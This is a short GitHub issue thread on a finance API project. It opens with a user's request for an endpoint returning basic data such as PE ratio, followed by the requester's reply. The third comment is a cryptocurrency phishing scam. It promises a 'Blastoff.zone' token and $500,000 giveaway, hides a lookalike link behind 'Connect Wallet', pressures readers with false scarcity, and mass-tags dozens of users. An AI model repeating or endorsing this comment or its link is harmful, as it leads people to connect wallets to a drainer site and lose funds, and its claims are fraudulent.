### ISSUE TITLE
Feature Request : can we have an endpoint for basic financial data 

### ISSUE THREAD

**Issue by Shreyaan** [devfinwiz/Fin-Maestro-Kin#26]
basically an endpoint which would return basic data like pe ratio

**Comment by Shreyaan** [comment]
no problem. when I added this issus feature request template wasn't available. I'll open a new one

**Comment by n1md7** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
Gh0st5ive, @ralbear, @ty9052, @g13-x, @nanvel, @bumblebeebh, @fplein, @code1990, @Yash-weeber, @ardaaktas0, @rupadana, @willguitaradmfar, @CharlesCreativeContent, @zDemoniac, @utlimate, @grigio, @ger1964jou, @clxdsjyx, @ibigforko, @codeagainst, @beaquant, @cdelouya, @Gawii, @Marcel314, @devfinwiz, @flappyjet, @korokd, @alexxtrading, @spencewood, @dnshi, @CryptoQuantic, @ketansp, @nkostadinov, @tmorgan4, @jj701, @mblkhr, @zeruk, @snfxgsx, @yuzhiyuan, @pahlot, @ilyaDegtyarenko, @oldenlandia, @darkloud, @ly0, @MilleniumSpark, @wqrz, @Jufik, @chanyk-joseph, @kl29, @kevorkcapital1
